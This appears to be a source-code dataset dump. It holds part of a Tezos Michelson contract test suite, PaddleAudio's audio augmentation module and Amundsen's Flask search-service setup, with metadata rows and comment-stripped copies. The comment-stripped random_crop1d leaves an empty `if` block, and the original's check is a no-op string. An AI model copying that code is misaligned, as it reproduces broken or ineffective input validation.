+ 'hfqFVuG7f2fGCzrEHSAZgrsrQWpxduDPk9qZRgrpzwJnSHC3gZJ'
)
arg = f'(Pair {byt} "{sign}")'
client.transfer(
0,
"bootstrap1",
"reveal_signed_preimage",
['-arg', arg, '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
# Test vote_for_delegate
def test_vote_for_delegate_originate(self, client: Client, session: dict):
b_3 = IDENTITIES['bootstrap3']['identity']
b_4 = IDENTITIES['bootstrap4']['identity']
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'vote_for_delegate.tz'
)
storage = f'''(Pair (Pair "{b_3}" None) (Pair "{b_4}" None))'''
originate(client, session, path, storage, 1000)
assert client.get_delegate('vote_for_delegate').delegate is None
def test_vote_for_delegate_wrong_identity1(self, client: Client):
# We check failure of CHECK_SIGNATURE ; ASSERT in the script.
with utils.assert_run_failure("At line 15 characters 57 to 61"):
client.transfer(
0,
"bootstrap1",
"vote_for_delegate",
['-arg', 'None', '--burn-cap', '10'],
)
def test_vote_for_delegate_wrong_identity2(self, client: Client):
# We check failure of CHECK_SIGNATURE ; ASSERT in the script.
with utils.assert_run_failure("At line 15 characters 57 to 61"):
client.transfer(
0,
"bootstrap2",
"vote_for_delegate",
['-arg', 'None', '--burn-cap', '10'],
)
def test_vote_for_delegate_b3_vote_for_b5(self, client: Client):
b_5 = IDENTITIES['bootstrap5']['identity']
client.transfer(
0,
"bootstrap3",
"vote_for_delegate",
['-arg', f'(Some "{b_5}")', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
storage = client.get_storage('vote_for_delegate')
assert re.search(b_5, storage)
def test_vote_for_delegate_still_no_delegate1(self, client: Client):
assert client.get_delegate('vote_for_delegate').delegate is None
def test_vote_for_delegate_b4_vote_for_b2(self, client: Client):
b_2 = IDENTITIES['bootstrap2']['identity']
client.transfer(
0,
"bootstrap4",
"vote_for_delegate",
['-arg', f'(Some "{b_2}")', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
storage = client.get_storage('vote_for_delegate')
assert re.search(b_2, storage)
def test_vote_for_delegate_still_no_delegate2(self, client: Client):
assert client.get_delegate('vote_for_delegate').delegate is None
def test_vote_for_delegate_b4_vote_for_b5(self, client: Client):
b_5 = IDENTITIES['bootstrap5']['identity']
client.transfer(
0,
"bootstrap4",
"vote_for_delegate",
['-arg', f'(Some "{b_5}")', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
storage = client.get_storage('vote_for_delegate')
assert re.search(b_5, storage)
def test_vote_for_delegate_has_delegate(self, client: Client):
b_5 = IDENTITIES['bootstrap5']['identity']
result = client.get_delegate('vote_for_delegate')
assert result.delegate == b_5
def test_multiple_entrypoints_counter(self, session: dict, client: Client):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'multiple_entrypoints_counter.tz'
)
storage = 'None'
# originate contract
originate(client, session, path, storage, 0)
utils.bake(client, 'bootstrap5')
# call contract: creates the internal contract and calls it.
client.transfer(
0,
'bootstrap1',
'multiple_entrypoints_counter',
['--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
assert client.get_storage('multiple_entrypoints_counter') == 'None', (
"The storage of the multiple_entrypoints_counter contract"
" should be None"
)
# Test CONTRACT with/without entrypoint annotation on literal address
# parameters with/without entrypoint annotation
def test_originate_simple_entrypoints(self, session: dict, client: Client):
contract_target = os.path.join(
CONTRACT_PATH, 'entrypoints', 'simple_entrypoints.tz'
)
originate(client, session, contract_target, 'Unit', 0)
utils.bake(client, 'bootstrap5')
@pytest.mark.parametrize(
'contract_annotation, contract_type, param, expected_storage',
[
# tests passing adr to CONTRACT %A unit
# where adr has an entrypoint %A of type unit, is allowed.
('%A', 'unit', '"{adr}"', '(Some "{adr}%A")'),
('%B', 'string', '"{adr}"', '(Some "{adr}%B")'),
('%C', 'nat', '"{adr}"', '(Some "{adr}%C")'),
# tests passing adr%A to CONTRACT %A unit: redundant specification
# of entrypoint not allowed so CONTRACT returns None
('%A', 'unit', '"{adr}%A"', 'None'),
('%A', 'unit', '"{adr}%B"', 'None'),
('%A', 'unit', '"{adr}%D"', 'None'),
('%A', 'unit', '"{adr}%A"', 'None'),
('%B', 'unit', '"{adr}%A"', 'None'),
('%D', 'unit', '"{adr}%A"', 'None'),
# tests passing adr%A to CONTRACT unit:
# where adr has an entrypoint %A of type unit, is allowed.
('', 'unit', '"{adr}%A"', '(Some "{adr}%A")'),
('', 'string', '"{adr}%B"', '(Some "{adr}%B")'),
('', 'nat', '"{adr}%C"', '(Some "{adr}%C")'),
# tests passing adr%B to CONTRACT unit:
# as entrypoint %B of simple_entrypoints.tz has type string,
# CONTRACT will return None.
('', 'unit', '"{adr}%B"', 'None'),
# tests passing adr%D to CONTRACT unit:
# as entrypoint %D does not exist in simple_entrypoints.tz,
# CONTRACT will return None.
('', 'unit', '"{adr}%D"', 'None'),
# tests passing adr to CONTRACT unit:
# as adr does not have type unit, CONTRACT returns None.
('', 'unit', '"{adr}"', 'None'),
# entrypoint that does not exist
('%D', 'unit', '"{adr}"', 'None'),
# ill-typed entrypoints
('%A', 'int', '"{adr}"', 'None'),
('%B', 'unit', '"{adr}"', 'None'),
('%C', 'int', '"{adr}"', 'None'),
],
)
def test_simple_entrypoints(
self,
session,
client,
contract_annotation,
contract_type,
param,
expected_storage,
):
contract = f'''parameter address;
storage (option address);
code {{
CAR;
CONTRACT {contract_annotation} {contract_type};
IF_SOME {{ ADDRESS; SOME }} {{ NONE address; }};
NIL operation;
PAIR
}};'''
param = param.format(adr=session['contract'])
expected_storage = expected_storage.format(adr=session['contract'])
run_script_res = client.run_script(contract, 'None', param, file=False)
assert run_script_res.storage == expected_storage
@pytest.mark.contract
class TestComparables:
def test_comparable_unit(self, client):
client.typecheck_data('{}', '(set unit)')
client.typecheck_data('{Unit}', '(set unit)')
def test_comparable_options(self, client):
client.typecheck_data('{}', '(set (option nat))')
client.typecheck_data('{None; Some 1; Some 2}', '(set (option int))')
utils.assert_typecheck_data_failure(
client, '{Some "foo"; Some "bar"}', '(set (option string))'
)
utils.assert_typecheck_data_failure(
client, '{Some Unit; None}', '(set (option unit))'
)
def test_comparable_unions(self, client):
client.typecheck_data('{}', '(set (or unit bool))')
client.typecheck_data(
'{Left 3; Left 4; Right "bar"; Right "foo"}',
'(set (or nat string))',
)
utils.assert_typecheck_data_failure(
client, '{Left 2; Left 1}', '(set (or mutez unit))'
)
utils.assert_typecheck_data_failure(
client, '{Right True; Right False}', '(set (or unit bool))'
)
utils.assert_typecheck_data_failure(
client, '{Right 0; Left 1}', '(set (or nat nat))'
)
def test_comparable_pair(self, client: Client):
# tests that comb pairs are comparable and that the order is the
# expected one
client.typecheck_data('{}', '(set (pair nat string))')
client.typecheck_data('{Pair 0 "foo"}', '(set (pair nat string))')
client.typecheck_data(
'{Pair 0 "foo"; Pair 1 "bar"}', '(set (pair nat string))'
)
client.typecheck_data(
'{Pair 0 "bar"; Pair 0 "foo"; \
Pair 1 "bar"; Pair 1 "foo"}',
'(set (pair nat string))',
)
client.typecheck_data('{}', '(set (pair nat (pair string bytes)))')
client.typecheck_data('{}', '(map (pair nat string) unit)')
client.typecheck_data(
'{Elt (Pair 0 "foo") Unit}', '(map (pair nat string) unit)'
)
client.typecheck_data(
'{Elt (Pair 0 "foo") Unit; \
Elt (Pair 1 "bar") Unit}',
'(map (pair nat string) unit)',
)
client.typecheck_data(
'{Elt (Pair 0 "bar") Unit; \
Elt (Pair 0 "foo") Unit; \
Elt (Pair 1 "bar") Unit; \
Elt (Pair 1 "foo") Unit}',
'(map (pair nat string) unit)',
)
client.typecheck_data('{}', '(map (pair nat (pair string bytes)) unit)')
client.typecheck_data('{}', '(big_map (pair nat string) unit)')
client.typecheck_data(
'{Elt (Pair 0 "foo") Unit}', '(big_map (pair nat string) unit)'
)
client.typecheck_data(
'{Elt (Pair 0 "foo") Unit; \
Elt (Pair 1 "bar") Unit}',
'(big_map (pair nat string) unit)',
)
client.typecheck_data(
'{Elt (Pair 0 "bar") Unit; \
Elt (Pair 0 "foo") Unit; \
Elt (Pair 1 "bar") Unit; \
Elt (Pair 1 "foo") Unit}',
'(big_map (pair nat string) unit)',
)
client.typecheck_data(
'{}', '(big_map (pair nat (pair string bytes)) unit)'
)
client.typecheck_data('{}', '(set (pair (pair nat nat) nat))')
client.typecheck_data(
'{}',
'(set (pair (pair int nat) \
(pair bool bytes)))',
)
def test_order_of_pairs(self, client: Client):
# tests that badly-ordered set literals are rejected
utils.assert_typecheck_data_failure(
client, '{Pair 0 "foo"; Pair 0 "bar"}', '(set (pair nat string))'
)
utils.assert_typecheck_data_failure(
client, '{Pair 1 "bar"; Pair 0 "foo"}', '(set (pair nat string))'
)
def test_comparable_chain_id(self, client):
client.typecheck_data('{}', '(set chain_id)')
chain1 = client.rpc('get', 'chains/main/chain_id')
chain2 = 'NetXZVhNXbDTx5M'
utils.assert_typecheck_data_failure(
client,
'{"' + f'{chain1}' + '"; "' + f'{chain2}' + '"}',
'(set chain_id)',
)
client.typecheck_data(
'{"' + f'{chain2}' + '"; "' + f'{chain1}' + '"}', '(set chain_id)'
)
def test_comparable_signature(self, client):
client.typecheck_data('{}', '(set signature)')
packed = client.pack('Unit', 'unit')
sig1 = client.sign_bytes_of_string(packed, "bootstrap1")
sig2 = client.sign_bytes_of_string(packed, "bootstrap2")
utils.assert_typecheck_data_failure(
client,
'{"' + f'{sig1}' + '"; "' + f'{sig2}' + '"}',
'(set signature)',
)
client.typecheck_data(
'{"' + f'{sig2}' + '"; "' + f'{sig1}' + '"}', '(set signature)'
)
def test_comparable_key(self, client):
pubkey1 = IDENTITIES['bootstrap1']['public']
pubkey2 = IDENTITIES['bootstrap2']['public']
client.typecheck_data('{}', '(set key)')
utils.assert_typecheck_data_failure(
client,
'{"' + f'{pubkey1}' + '"; "' + f'{pubkey2}' + '"}',
'(set key)',
)
client.typecheck_data(
'{"' + f'{pubkey2}' + '"; "' + f'{pubkey1}' + '"}', '(set key)'
)
def test_comparable_key_different_schemes(self, client):
client.gen_key('sk1', ['--sig', 'ed25519'])
key1 = client.show_address('sk1').public_key
client.gen_key('sk2', ['--sig', 'secp256k1'])
key2 = client.show_address('sk2').public_key
client.gen_key('sk3', ['--sig', 'p256'])
key3 = client.show_address('sk3').public_key
# Three public keys of the three different signature schemes, ordered
client.typecheck_data(
'{"' + key1 + '"; "' + key2 + '"; "' + key3 + '"}', '(set key)'
)
# Test all orderings that do not respect the comparable order
utils.assert_typecheck_data_failure(
client,
'{"' + key1 + '"; "' + key3 + '"; "' + key2 + '"}',
'(set key)',
)
utils.assert_typecheck_data_failure(
client,
'{"' + key2 + '"; "' + key1 + '"; "' + key3 + '"}',
'(set key)',
)
utils.assert_typecheck_data_failure(
client,
'{"' + key2 + '"; "' + key3 + '"; "' + key1 + '"}',
'(set key)',
)
utils.assert_typecheck_data_failure(
client,
'{"' + key3 + '"; "' + key1 + '"; "' + key2 + '"}',
'(set key)',
)
utils.assert_typecheck_data_failure(
client,
'{"' + key3 + '"; "' + key2 + '"; "' + key1 + '"}',
'(set key)',
)
@pytest.mark.contract
class TestTypecheckingErrors:
def test_big_map_arity_error(self, client: Client):
error_pattern = (
'primitive EMPTY_BIG_MAP expects 2 arguments but is given 1.'
)
with utils.assert_run_failure(error_pattern):
client.typecheck(
os.path.join(CONTRACT_PATH, 'ill_typed', 'big_map_arity.tz')
)
BAD_ANNOT_TEST = '''
parameter bytes;
storage (option (lambda unit unit));
code { CAR; UNPACK (lambda unit unit); NIL operation; PAIR}
'''
@pytest.mark.contract
class TestBadAnnotation:
def test_write_contract_bad_annot(self, tmpdir, session: dict):
name = 'bad_annot.tz'
contract = f'{tmpdir}/{name}'
script = BAD_ANNOT_TEST
with open(contract, 'w') as contract_file:
contract_file.write(script)
session[name] = contract
def test_bad_annotation(self, client: Client, session: dict):
name = 'bad_annot.tz'
contract = session[name]
# This was produced by running "tezos-client hash data '{ UNIT
# ; PAIR ; CAR %faa }' of type 'lambda unit unit'" and
# replacing the two last bytes (that correspond to the two
# 'a's at the end of the annotation) by the 0xff byte which is
# not a valid UTF8-encoding of a string
parameter = '0x05020000000e034f03420416000000042566ffff'
res = client.run_script(contract, 'None', parameter)
assert res.storage == 'None'
@pytest.mark.contract
class TestOrderInTopLevelDoesNotMatter:
@pytest.fixture
def contract_splitted_in_top_level_elements(self):
return [
"parameter nat",
"storage unit",
"code { CDR; NIL operation; PAIR }",
]
def test_shuffle(
self, client: Client, contract_splitted_in_top_level_elements
):
for shuffled_list in itertools.permutations(
contract_splitted_in_top_level_elements
):
contract = ";\n".join(shuffled_list)
client.typecheck(contract, file=False)
@pytest.mark.contract
@pytest.mark.regression
class TestSelfAddressTransfer:
def test_self_address_originate_sender(
self, client_regtest_scrubbed, session
):
client = client_regtest_scrubbed
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'self_address_sender.tz'
)
originate(client, session, path, 'Unit', 0)
def test_self_address_originate_receiver(
self, client_regtest_scrubbed, session
):
client = client_regtest_scrubbed
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'self_address_receiver.tz'
)
originate(client, session, path, 'Unit', 0)
session['receiver_address'] = session['contract']
def test_send_self_address(self, client_regtest_scrubbed, session):
client = client_regtest_scrubbed
receiver_address = session['receiver_address']
client.transfer(
0,
'bootstrap2',
'self_address_sender',
['--arg', f'"{receiver_address}"', '--burn-cap', '2'],
)
utils.bake(client, 'bootstrap5')
@pytest.mark.slow
@pytest.mark.contract
@pytest.mark.regression
class TestScriptHashRegression:
@pytest.mark.parametrize("contract", all_contracts())
def test_contract_hash(self, client_regtest: Client, contract):
client = client_regtest
assert contract.endswith(
'.tz'
), "test contract should have .tz extension"
client.hash_script(os.path.join(CONTRACT_PATH, contract))
@pytest.mark.contract
class TestScriptHashOrigination:
def test_contract_hash_with_origination(
self, client: Client, session: dict
):
script = 'parameter unit; storage unit; code {CAR; NIL operation; PAIR}'
originate(
client,
session,
contract=script,
init_storage='Unit',
amount=1000,
contract_name='dummy_contract',
)
hash1 = client.hash_script(script)
hash2 = client.get_script_hash('dummy_contract')
assert hash1 == hash2
@pytest.mark.contract
@pytest.mark.regression
class TestNormalize:
modes = [None, 'Readable', 'Optimized', 'Optimized_legacy']
@pytest.mark.parametrize('mode', modes)
def test_normalize_unparsing_mode(self, client_regtest_scrubbed, mode):
client = client_regtest_scrubbed
input_data = (
'{Pair 0 3 6 9; Pair 1 (Pair 4 (Pair 7 10)); {2; 5; 8; 11}}'
)
input_type = 'list (pair nat nat nat nat)'
client.normalize(input_data, input_type, mode=mode)
def test_normalize_legacy_flag(self, client_regtest_scrubbed):
client = client_regtest_scrubbed
input_data = '{Elt %a 0 1}'
input_type = 'map nat nat'
client.normalize(input_data, input_type, legacy=True)
error_pattern = 'unexpected annotation.'
with utils.assert_run_failure(error_pattern):
client.normalize(input_data, input_type, legacy=False)
@pytest.mark.parametrize('mode', modes)
def test_normalize_script(self, client_regtest_scrubbed, mode):
client = client_regtest_scrubbed
path = os.path.join(CONTRACT_PATH, 'opcodes', 'comb-literals.tz')
client.normalize_script(path, mode=mode)
types = [
'nat',
'list nat',
'pair nat int',
'list (pair nat int)',
'pair nat int bool',
'list (pair nat int bool)',
'pair nat int bool bytes',
'list (pair nat int bool bytes)',
]
@pytest.mark.parametrize('typ', types)
def test_normalize_type(self, client_regtest_scrubbed, typ):
client = client_regtest_scrubbed
client.normalize_type(typ)
| true | true |
f71044d972aeda32c49abd7d7f83422f3a1eb8f0 | 5,359 | py | Python | PaddleAudio/paddleaudio/features/augment.py | AshburnLee/models | 98fa58030f8ce352b3818f43897ac719ccffdffc | [
"Apache-2.0"
] | 1 | 2022-02-13T08:33:52.000Z | 2022-02-13T08:33:52.000Z | PaddleAudio/paddleaudio/features/augment.py | AshburnLee/models | 98fa58030f8ce352b3818f43897ac719ccffdffc | [
"Apache-2.0"
] | null | null | null | PaddleAudio/paddleaudio/features/augment.py | AshburnLee/models | 98fa58030f8ce352b3818f43897ac719ccffdffc | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Iterable, List, Optional, Tuple, TypeVar
import numpy as np
from numpy import ndarray as array
from paddleaudio.backends import depth_convert
from paddleaudio.utils import ParameterError
__all__ = [
'depth_augment',
'spect_augment',
'random_crop1d',
'random_crop2d',
'adaptive_spect_augment',
]
def randint(high: int) -> int:
"""Generate one random integer in range [0 high)
This is a helper function for random data augmentaiton
"""
return int(np.random.randint(0, high=high))
def rand() -> float:
"""Generate one floating-point number in range [0 1)
This is a helper function for random data augmentaiton
"""
return float(np.random.rand(1))
def depth_augment(y: array,
choices: List = ['int8', 'int16'],
probs: List[float] = [0.5, 0.5]) -> array:
""" Audio depth augmentation
Do audio depth augmentation to simulate the distortion brought by quantization.
"""
assert len(probs) == len(
choices
), 'number of choices {} must be equal to size of probs {}'.format(
len(choices), len(probs))
depth = np.random.choice(choices, p=probs)
src_depth = y.dtype
y1 = depth_convert(y, depth)
y2 = depth_convert(y1, src_depth)
return y2
def adaptive_spect_augment(spect: array,
tempo_axis: int = 0,
level: float = 0.1) -> array:
"""Do adpative spectrogram augmentation
The level of the augmentation is gowern by the paramter level,
ranging from 0 to 1, with 0 represents no augmentation。
"""
assert spect.ndim == 2., 'only supports 2d tensor or numpy array'
if tempo_axis == 0:
nt, nf = spect.shape
else:
nf, nt = spect.shape
time_mask_width = int(nt * level * 0.5)
freq_mask_width = int(nf * level * 0.5)
num_time_mask = int(10 * level)
num_freq_mask = int(10 * level)
if tempo_axis == 0:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[start:start + time_mask_width, :] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[:, start:start + freq_mask_width] = 0
else:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[:, start:start + time_mask_width] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[start:start + freq_mask_width, :] = 0
return spect
def spect_augment(spect: array,
tempo_axis: int = 0,
max_time_mask: int = 3,
max_freq_mask: int = 3,
max_time_mask_width: int = 30,
max_freq_mask_width: int = 20) -> array:
"""Do spectrogram augmentation in both time and freq axis
Reference:
"""
assert spect.ndim == 2., 'only supports 2d tensor or numpy array'
if tempo_axis == 0:
nt, nf = spect.shape
else:
nf, nt = spect.shape
num_time_mask = randint(max_time_mask)
num_freq_mask = randint(max_freq_mask)
time_mask_width = randint(max_time_mask_width)
freq_mask_width = randint(max_freq_mask_width)
if tempo_axis == 0:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[start:start + time_mask_width, :] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[:, start:start + freq_mask_width] = 0
else:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[:, start:start + time_mask_width] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[start:start + freq_mask_width, :] = 0
return spect
def random_crop1d(y: array, crop_len: int) -> array:
""" Do random cropping on 1d input signal
The input is a 1d signal, typically a sound waveform
"""
if y.ndim != 1:
'only accept 1d tensor or numpy array'
n = len(y)
idx = randint(n - crop_len)
return y[idx:idx + crop_len]
def random_crop2d(s: array, crop_len: int, tempo_axis: int = 0) -> array:
""" Do random cropping for 2D array, typically a spectrogram.
The cropping is done in temporal direction on the time-freq input signal.
"""
if tempo_axis >= s.ndim:
raise ParameterError('axis out of range')
n = s.shape[tempo_axis]
idx = randint(high=n - crop_len)
sli = [slice(None) for i in range(s.ndim)]
sli[tempo_axis] = slice(idx, idx + crop_len)
out = s[tuple(sli)]
return out
| 31.156977 | 83 | 0.631274 |
from typing import Iterable, List, Optional, Tuple, TypeVar
import numpy as np
from numpy import ndarray as array
from paddleaudio.backends import depth_convert
from paddleaudio.utils import ParameterError
__all__ = [
'depth_augment',
'spect_augment',
'random_crop1d',
'random_crop2d',
'adaptive_spect_augment',
]
def randint(high: int) -> int:
return int(np.random.randint(0, high=high))
def rand() -> float:
return float(np.random.rand(1))
def depth_augment(y: array,
choices: List = ['int8', 'int16'],
probs: List[float] = [0.5, 0.5]) -> array:
assert len(probs) == len(
choices
), 'number of choices {} must be equal to size of probs {}'.format(
len(choices), len(probs))
depth = np.random.choice(choices, p=probs)
src_depth = y.dtype
y1 = depth_convert(y, depth)
y2 = depth_convert(y1, src_depth)
return y2
def adaptive_spect_augment(spect: array,
tempo_axis: int = 0,
level: float = 0.1) -> array:
assert spect.ndim == 2., 'only supports 2d tensor or numpy array'
if tempo_axis == 0:
nt, nf = spect.shape
else:
nf, nt = spect.shape
time_mask_width = int(nt * level * 0.5)
freq_mask_width = int(nf * level * 0.5)
num_time_mask = int(10 * level)
num_freq_mask = int(10 * level)
if tempo_axis == 0:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[start:start + time_mask_width, :] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[:, start:start + freq_mask_width] = 0
else:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[:, start:start + time_mask_width] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[start:start + freq_mask_width, :] = 0
return spect
def spect_augment(spect: array,
tempo_axis: int = 0,
max_time_mask: int = 3,
max_freq_mask: int = 3,
max_time_mask_width: int = 30,
max_freq_mask_width: int = 20) -> array:
assert spect.ndim == 2., 'only supports 2d tensor or numpy array'
if tempo_axis == 0:
nt, nf = spect.shape
else:
nf, nt = spect.shape
num_time_mask = randint(max_time_mask)
num_freq_mask = randint(max_freq_mask)
time_mask_width = randint(max_time_mask_width)
freq_mask_width = randint(max_freq_mask_width)
if tempo_axis == 0:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[start:start + time_mask_width, :] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[:, start:start + freq_mask_width] = 0
else:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[:, start:start + time_mask_width] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[start:start + freq_mask_width, :] = 0
return spect
def random_crop1d(y: array, crop_len: int) -> array:
if y.ndim != 1:
n = len(y)
idx = randint(n - crop_len)
return y[idx:idx + crop_len]
def random_crop2d(s: array, crop_len: int, tempo_axis: int = 0) -> array:
if tempo_axis >= s.ndim:
raise ParameterError('axis out of range')
n = s.shape[tempo_axis]
idx = randint(high=n - crop_len)
sli = [slice(None) for i in range(s.ndim)]
sli[tempo_axis] = slice(idx, idx + crop_len)
out = s[tuple(sli)]
return out
| true | true |
f71045928932e18081469a28d0e1d162f32eb006 | 4,059 | py | Python | search_service/__init__.py | lukelowery/amundsensearchlibrary | cdaf1e3b75edd55bee8b0c65178863e25b0a479a | [
"Apache-2.0"
] | null | null | null | search_service/__init__.py | lukelowery/amundsensearchlibrary | cdaf1e3b75edd55bee8b0c65178863e25b0a479a | [
"Apache-2.0"
] | null | null | null | search_service/__init__.py | lukelowery/amundsensearchlibrary | cdaf1e3b75edd55bee8b0c65178863e25b0a479a | [
"Apache-2.0"
] | null | null | null | import ast
import importlib
import os
import logging
import logging.config
import sys
from flask import Flask, Blueprint
from flask_restful import Api
from flask_cors import CORS
from typing import Dict, Any # noqa: F401
from flasgger import Swagger
from search_service.api.dashboard import SearchDashboardAPI
from search_service.api.table import SearchTableAPI, SearchTableFilterAPI
from search_service.api.user import SearchUserAPI
from search_service.api.document import DocumentUserAPI, DocumentTableAPI, DocumentTablesAPI, DocumentUsersAPI
from search_service.api.healthcheck import healthcheck
# For customized flask use below arguments to override.
FLASK_APP_MODULE_NAME = os.getenv('FLASK_APP_MODULE_NAME')
FLASK_APP_CLASS_NAME = os.getenv('FLASK_APP_CLASS_NAME')
FLASK_APP_KWARGS_DICT_STR = os.getenv('FLASK_APP_KWARGS_DICT')
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
# Environment Variable to enable cors
CORS_ENABLED = os.environ.get('CORS_ENABLED', False)
def create_app(*, config_module_class: str) -> Flask:
"""
Creates app in function so that flask with flask extensions can be
initialized with specific config. Here it defines the route of APIs
so that it can be seen in one place where implementation is separated.
Config is being fetched via module.class name where module.class name
can be passed through environment variable.
This is to make config fetched through runtime PYTHON_PATH so that
Config class can be easily injected.
More on: http://flask.pocoo.org/docs/1.0/config/
:param config_module_class: name of the config
:return: Flask
"""
if FLASK_APP_MODULE_NAME and FLASK_APP_CLASS_NAME:
print(f'Using requested Flask module {FLASK_APP_MODULE_NAME} '
f'and class {FLASK_APP_CLASS_NAME}', file=sys.stderr)
class_obj = getattr(
importlib.import_module(FLASK_APP_MODULE_NAME),
FLASK_APP_CLASS_NAME
)
flask_kwargs_dict = {} # type: Dict[str, Any]
if FLASK_APP_KWARGS_DICT_STR:
print(f'Using kwargs {FLASK_APP_KWARGS_DICT_STR} to instantiate Flask',
file=sys.stderr)
flask_kwargs_dict = ast.literal_eval(FLASK_APP_KWARGS_DICT_STR)
app = class_obj(__name__, **flask_kwargs_dict)
else:
app = Flask(__name__)
if CORS_ENABLED:
CORS(app)
config_module_class = \
os.getenv('SEARCH_SVC_CONFIG_MODULE_CLASS') or config_module_class
app.config.from_object(config_module_class)
if app.config.get('LOG_CONFIG_FILE'):
logging.config.fileConfig(app.config.get('LOG_CONFIG_FILE'), disable_existing_loggers=False)
else:
logging.basicConfig(format=app.config.get('LOG_FORMAT'), datefmt=app.config.get('LOG_DATE_FORMAT'))
logging.getLogger().setLevel(app.config.get('LOG_LEVEL'))
logging.info('Creating app with config name {}'
.format(config_module_class))
logging.info('Created app with config name {}'.format(config_module_class))
api_bp = Blueprint('api', __name__)
api_bp.add_url_rule('/healthcheck', 'healthcheck', healthcheck)
api = Api(api_bp)
# Table Search API
# TODO: Rename endpoint to be more generic and accept a resource type so that logic can be re-used
api.add_resource(SearchTableFilterAPI, '/search_table')
api.add_resource(SearchTableAPI, '/search')
# User Search API
api.add_resource(SearchUserAPI, '/search_user')
# Dashboard Search API
api.add_resource(SearchDashboardAPI, '/search_dashboard')
# DocumentAPI
api.add_resource(DocumentTablesAPI, '/document_table')
api.add_resource(DocumentTableAPI, '/document_table/<document_id>')
api.add_resource(DocumentUsersAPI, '/document_user')
api.add_resource(DocumentUserAPI, '/document_user/<document_id>')
app.register_blueprint(api_bp)
if app.config.get('SWAGGER_ENABLED'):
Swagger(app, template_file=os.path.join(ROOT_DIR, app.config.get('SWAGGER_TEMPLATE_PATH')), parse=True)
return app
| 38.292453 | 111 | 0.74033 | import ast
import importlib
import os
import logging
import logging.config
import sys
from flask import Flask, Blueprint
from flask_restful import Api
from flask_cors import CORS
from typing import Dict, Any
from flasgger import Swagger
from search_service.api.dashboard import SearchDashboardAPI
from search_service.api.table import SearchTableAPI, SearchTableFilterAPI
from search_service.api.user import SearchUserAPI
from search_service.api.document import DocumentUserAPI, DocumentTableAPI, DocumentTablesAPI, DocumentUsersAPI
from search_service.api.healthcheck import healthcheck
FLASK_APP_MODULE_NAME = os.getenv('FLASK_APP_MODULE_NAME')
FLASK_APP_CLASS_NAME = os.getenv('FLASK_APP_CLASS_NAME')
FLASK_APP_KWARGS_DICT_STR = os.getenv('FLASK_APP_KWARGS_DICT')
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
CORS_ENABLED = os.environ.get('CORS_ENABLED', False)
def create_app(*, config_module_class: str) -> Flask:
if FLASK_APP_MODULE_NAME and FLASK_APP_CLASS_NAME:
print(f'Using requested Flask module {FLASK_APP_MODULE_NAME} '
f'and class {FLASK_APP_CLASS_NAME}', file=sys.stderr)
class_obj = getattr(
importlib.import_module(FLASK_APP_MODULE_NAME),
FLASK_APP_CLASS_NAME
)
flask_kwargs_dict = {}
if FLASK_APP_KWARGS_DICT_STR:
print(f'Using kwargs {FLASK_APP_KWARGS_DICT_STR} to instantiate Flask',
file=sys.stderr)
flask_kwargs_dict = ast.literal_eval(FLASK_APP_KWARGS_DICT_STR)
app = class_obj(__name__, **flask_kwargs_dict)
else:
app = Flask(__name__)
if CORS_ENABLED:
CORS(app)
config_module_class = \
os.getenv('SEARCH_SVC_CONFIG_MODULE_CLASS') or config_module_class
app.config.from_object(config_module_class)
if app.config.get('LOG_CONFIG_FILE'):
logging.config.fileConfig(app.config.get('LOG_CONFIG_FILE'), disable_existing_loggers=False)
else:
logging.basicConfig(format=app.config.get('LOG_FORMAT'), datefmt=app.config.get('LOG_DATE_FORMAT'))
logging.getLogger().setLevel(app.config.get('LOG_LEVEL'))
logging.info('Creating app with config name {}'
.format(config_module_class))
logging.info('Created app with config name {}'.format(config_module_class))
api_bp = Blueprint('api', __name__)
api_bp.add_url_rule('/healthcheck', 'healthcheck', healthcheck)
api = Api(api_bp)
api.add_resource(SearchTableFilterAPI, '/search_table')
api.add_resource(SearchTableAPI, '/search')
api.add_resource(SearchUserAPI, '/search_user')
api.add_resource(SearchDashboardAPI, '/search_dashboard')
api.add_resource(DocumentTablesAPI, '/document_table')
api.add_resource(DocumentTableAPI, '/document_table/<document_id>')
api.add_resource(DocumentUsersAPI, '/document_user')
api.add_resource(DocumentUserAPI, '/document_user/<document_id>')
app.register_blueprint(api_bp)
if app.config.get('SWAGGER_ENABLED'):
